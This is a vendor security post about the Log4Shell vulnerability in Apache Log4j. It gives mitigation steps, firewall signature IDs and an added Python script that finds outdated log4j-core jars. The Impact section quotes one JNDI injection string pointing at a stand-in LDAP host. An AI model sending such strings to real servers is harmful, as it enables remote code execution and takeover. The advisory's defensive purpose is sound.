Guard against Log4Shell

zyxel_Lin
edited December 2021 in Security Highlight

What is the Vulnerable Log4j Package?

Log4j is an open-source project that is widely used for logging in Java. A remote code injection vulnerability (CVE-2021-44228) was found in Log4j versions between 2.x.x and 2.14.x. (A further exploit for Log4j, CVE-2021-45046, was also found in 2.15, so we recommend updating to version 2.17.) It allows attackers to send a specially formed command to the logger and easily obtain a remote shell (Log4Shell).

Impact

This vulnerability received the highest CVSS score (10) because the Log4j package is widely used and the vulnerability can be exploited remotely. If the server is vulnerable, attackers can send a crafted command (such as ${jndi:ldap://example.com/a}) to the Log4j package and obtain a shell to take over the server. Once the host is compromised, it can be used as a bot or a miner, or your important files can be encrypted by ransomware.

Zyxel Security Appliances Against Log4Shell

Zyxel is aware of the remote code execution (RCE) vulnerabilities in Apache Log4j and confirms that all of its security products are NOT affected [1]. Zyxel ATP/USG FLEX/USG Series firewalls provide multiple layers of protection to help defend you against the attack.

Mitigation

1.   On host: update to the latest version of Apache Log4j (>=2.17.0).

2.   On network:

  • To reduce the attack surface, don't publish the vulnerable applications to the Internet unless it's absolutely necessary. Use VPN technology for remote access to the applications.
  • Update to the latest IPS signature version and then enable the IPS function to protect your host. If your host uses SSL/TLS transmission, you should also enable SSL inspection for further detection. When the attack comes from a malicious IP address, the IP reputation feature defends you against the attack from that address.
  • Enabling the DNS filter, URL filter, Content Filter, AntiVirus and Sandbox features can also break the attack chain and avoid further infection.
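As an added example (not part of the Zyxel post), a small host-side check for mitigation step 1: it walks a directory tree, reads the version of every log4j-core jar it finds from the jar's own manifest (falling back to the file name), and flags anything below the 2.17.0 minimum recommended above. The directory layout and sample jars are constructed for the demo.

```python
"""Added example: locate Log4j core jars on a host and flag versions below 2.17.0."""
import os
import re
import tempfile
import zipfile
from typing import Iterator, Optional, Tuple

Version = Tuple[int, int, int]
MIN_SAFE: Version = (2, 17, 0)  # minimum recommended by the post
# Matches log4j-core-<major>.<minor>.<patch>[-qualifier].jar
JAR_NAME = re.compile(r"^log4j-core-(\d+)\.(\d+)\.(\d+)(?:[-.].*)?\.jar$")


def parse_version(text: str) -> Optional[Version]:
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3))) if m else None


def version_from_jar(path: str) -> Optional[Version]:
    # Prefer the manifest's Implementation-Version; fall back to the file name,
    # since repackaged jars are sometimes renamed.
    try:
        with zipfile.ZipFile(path) as jar:
            manifest = jar.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
            for line in manifest.splitlines():
                if line.startswith("Implementation-Version:"):
                    return parse_version(line.split(":", 1)[1])
    except (zipfile.BadZipFile, KeyError, OSError):
        pass
    return parse_version(os.path.basename(path))


def is_vulnerable(version: Optional[Version]) -> bool:
    # Per the post: 2.x releases below 2.17.0 (2.15 included) must be updated.
    return version is not None and version[0] == 2 and version < MIN_SAFE


def scan(root: str) -> Iterator[Tuple[str, Optional[Version], bool]]:
    for dirpath, _, files in os.walk(root):
        for name in files:
            if JAR_NAME.match(name):
                path = os.path.join(dirpath, name)
                version = version_from_jar(path)
                yield path, version, is_vulnerable(version)


def demo() -> dict:
    """Constructed sample: three fake jars in a temp dir, one without a manifest version."""
    root = tempfile.mkdtemp()
    for ver, manifest in (("2.14.1", "Implementation-Version: 2.14.1\n"),
                          ("2.17.1", "Implementation-Version: 2.17.1\n"),
                          ("2.16.0", "Manifest-Version: 1.0\n")):
        with zipfile.ZipFile(os.path.join(root, f"log4j-core-{ver}.jar"), "w") as jar:
            jar.writestr("META-INF/MANIFEST.MF", manifest)
    return {os.path.basename(p): vuln for p, _, vuln in scan(root)}
```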

Please refer to the signature information below.

ATP/USG FLEX/USG series:

v4.0.x.20211217.0

# Signature ID 131026, 131027 and 131028 are used for CVE-2021-44228.

# Signature ID 131029 and 131030 are used for CVE-2021-45046.

Reference

[1] Zyxel security advisory for Apache Log4j RCE vulnerabilities, https://www.zyxel.com/support/Zyxel_security_advisory_for_Apache_Log4j_RCE_vulnerability.shtml

Revision history

2021-12-17: Initial release